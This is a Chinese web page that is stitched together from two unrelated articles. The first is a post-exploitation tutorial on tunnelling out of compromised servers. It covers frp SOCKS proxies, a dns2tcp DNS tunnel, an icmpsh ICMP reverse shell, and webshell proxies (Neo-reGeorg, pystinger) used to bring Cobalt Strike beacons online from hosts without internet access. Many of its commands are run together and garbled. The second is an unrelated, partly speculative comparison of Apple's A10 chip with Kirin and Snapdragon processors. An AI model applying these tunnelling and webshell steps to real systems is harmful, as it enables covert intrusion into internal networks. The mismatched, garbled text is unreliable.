内网穿透以后访问主机数据库？内网渗透之主机出网OR不出网隧道搭建

作者：小菜更新时间：2025-04-26 点击数：

简介：当拿到权限之后，做完本地信息收集，最重要的就是做个隧道，对内网进行下一步攻击，这里简单介绍几个常用的工

【菜科解读】

当拿到权限之后，做完本地信息收集，最重要的就是做个隧道，对内网进行下一步攻击，这里简单介绍几个常用的工具，主要针对于出网和不出网两种情况。

出网情况

拿到服务器权限之后，遇见这种机器，十分简单，针对不同情况搭建不同隧道，为了速度可以建立sockets隧道、为了隐蔽可以使用dns隧道、icmp隧道等，本文简单介绍几个常用工具。

frp

frp 是一个专注于内网穿透的高性能的反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。

可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

项目地址：https://github.com/fatedier/frp/

下载之后，我们只需要关注四个文件即可：

frps

frps.ini

frpc

frpc.ini

修改frpc.ini，这里搭建sockets隧道，上传至目标服务器启动即可。

./frpc-cfrpc.ini

内网穿透以后怎么访问主机数据库内网渗透之主机出网OR不出网隧道搭建(1)

服务端根据frps.ini修改端口

内网穿透以后怎么访问主机数据库内网渗透之主机出网OR不出网隧道搭建(2)

启动监听

./frps-cfrps.ini

即可建立sockets隧道，利用Proxifierprox等，即可全局代理隧道，访问目标主机内网。

dns

这个比较麻烦需要准备一个域名，和一台DNS服务器，在域名解析添加一条NS记录和一条A记录。

举个例子，域名是123.com，添加一个子域名a.123.com，且类型为NS，并将NS记录指向b.123.com，然后将b.123.com建立A记录服务器IP即可，利用的工具也很多，本文简单介绍dns2tcp。

a.123.comNSb.123.com b.123.comA1.1.1.1

项目地址：https://github.com/HEYAHONG/dns2tcp

客户端

dns2tcpc-rnc-za.123.com1.1.1.1-l8888-d2 -r后接服务名称任意换,本文用nc -z后接NS记录的网址 -l后接本地端口

服务端

修改dns2tcpd.conf，

listen=0.0.0.0 port=53 user=root chroot=http://www.studyofnet.com/home/ domain=a.123.com key=123 resources=ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1080,http:127.0.0.1:80,https:127.0.0.1:8080

然后执行，dns隧道就搭建好了，利用nc进行传输文件即可。

dns2tcpd-F-d3-f/home/dns2tcpd.conf

建立传输

目标主机监听并接受文件即可。

icmp

icmp隧道主要因为大部分防火墙不会屏蔽 ping ，所以可以将流量封装在icmp进行传输，这种速度跟sockets相比太慢了，特殊情况才会使用。

项目地址：https://github.com/inquisb/icmpsh

服务端：

python icmpsh_m.py ip 目标ip

目标机

icmpsh.exe-t目标ip

即可反弹icmp隧道shell回来。

内网穿透以后怎么访问主机数据库内网渗透之主机出网OR不出网隧道搭建(5)

不出网情况

拿到服务器权限之后，遇见这种机器，只能利用基于webshell的代理，只需要将webshell上传到目标主机即可，然后建立tcp连接，主要利用session来识别不同的的tcp连接，我们攻击监听tcp，将数据post提交到webshell即可进行传输，本文简单介绍两个常用的。

Neo-reGeorg

Neo-reGeorg相当于是 reGeorg的升级版，有了更强的隐蔽性，原理都是相同的，常用于webshell代理流量，进而进行内网渗透。

项目地址：https://github.com/L-codes/Neo-reGeorg

首先需要设置密码，生成各种类型webshell，并上传至目标服务器

pythonneoreg.pygenerate-kpassword

上传至服务器即可，然后启动监听即可

pythonneoreg.py-kpassword-u

最后挂上sockets代理即可访问内网。

pystinger

毒刺(pystinger)通过webshell实现内网socks4代理，并且可以利用pystinge实现各种cs\msf上线，目前仅支持php、jsp(x)、aspx.

项目地址：https://github.com/FunnyWolf/pystinger

这个工具比较强大，这里可以直接上线cs，简单介绍如何搭建socks4以及cs上线。

socks4隧道搭建：

首先上传proxy.php，然后上传stinger_server.exe 到目标服务器，并start命令运行该程序

最后在我们的服务器执行

./stinger_client-w

即可建立socks4隧道，利用Proxifierprox等，访问目标主机内网。

cs上线：

前面大体相同，首先上传proxy.php，然后上传stinger_server.exe 到目标服务器，启动利用冰蝎start启动即可

我们的服务器也需要进行监听

./stinger_client-w

然后cs进行监听，端口填写60020

#p#分页标题#e#

进而利用cs生成powershell

执行可以利用pystinger，进行不出网主机上线。

End

这里只是抛砖引玉，引出一些在之前工作中针对于不出网以及出网主机，用过最多的几个隧道代理工具，还请各位大佬勿喷，有更好的工具多补充，共同交流，这样我们才能共同成长，格拉德威尔曾说过：“人们眼中的天才之所以卓越非凡，并非天资超人一等，而是付出了持续不断的努力。

1万小时的锤炼是任何人从平凡变成世界级大师的必要条件“。

苹果a10处理器有哪些机型？苹果a10和麒麟骁龙哪个好

苹果a10处理器是大家一直热议的话题，很多朋友们表示，不太懂苹果a10处理器相当于安卓什么处理器，于是将麒麟和骁龙举了个例子，让这两者和苹果对比，看哪款最好。

下面，我们将为您分享详细内容。

A10 Fusion详细参数我们先说一下苹果A10处理器的详细参数：A10 Fusion 芯片是苹果公司在2016年发布的旗舰级处理器芯片，搭载在iPhone7系手机上，其CPU方面采用2大2小四核心配置，GPU方面则采用了六核心图形处理芯片（苹果的自家GPU核心），基于台积电的16nm工艺制程，拥有33亿个晶体管（作为比较麒麟980是69亿晶体管），总的来说单从制程工艺和晶体管数量来说，A10的性能应当和目前安卓阵营的中端处理器类似。

苹果a10处理器有哪些机型iPhone7、iPhone7plus有哪些平板支持A10呢？好像目前还没有发布，如果发布的话有可能2款，分别是：1、iPad mini5: A9处理器/2G内存,其他不变；2、iPad Pro9.7: A10X处理器/4G内存；3、iPad Air3: A9X或者A10处理器/2G内存。

苹果a10和麒麟骁龙哪个好麒麟970、骁龙835都要胜A10一筹。

麒麟810更比A10强一头，骁龙845又比A10在多核性能方面更出众；总觉得A10似乎要被麒麟和骁龙给按在地上摩擦了。

事实上，真的如此吗？带着这个疑问，我们开始今天的研究。

单核性能的A10我们尽量的不用安兔兔进行跑分，毕竟安卓手机和iPhone手机不是在一个赛道上跑出的成绩，我们使用的是geekbench的跑分，，单核跑分上达到了3328分；在多核跑分上，达到了6036分。

我们如果单纯的看这个跑分，已经会发现一些端倪。

在单核方面，骁龙855的单核性能和A10是类似的：麒麟980的单核性能和A10也是类似的：我们可以得出结论：在单核性能方面，苹果确实发挥了处理器的优势，在性能方面，直接可以怒怼麒麟980和骁龙855处理器；可是，你要注意一点，虽然A10在多核性能方面，可能就和骁龙660这样的机型类似，可是你要知道，A10使用的是4核心处理器，在A11这款使用了6核心的处理器中，性能堪比麒麟980和骁龙855.这么比较靠谱吗？我们比较的是单核心的性能，对于手机而言，实际上是不靠谱的，菜叶说说，我们实际使用中，处理器确实有用，可是不能作为评判我们手机性能的唯一标准，我们在选择手机的时候，更应该关注度的是，在系统和处理器的通力合作下，怎么能够保证手机的整体性能和流畅性，而一味的追求单核或者多核性能，是有点本木倒置了，iPhone强就在于，它不是将跑分作为评价的标准，它的厉害之处，是我们在使用的时候，也能感觉到流畅的性能。

所以，A10的性能，你说和现在的旗舰安卓机比较也行；说它不及目前中端处理器的安卓机也行，它就在那里，从不参与比较。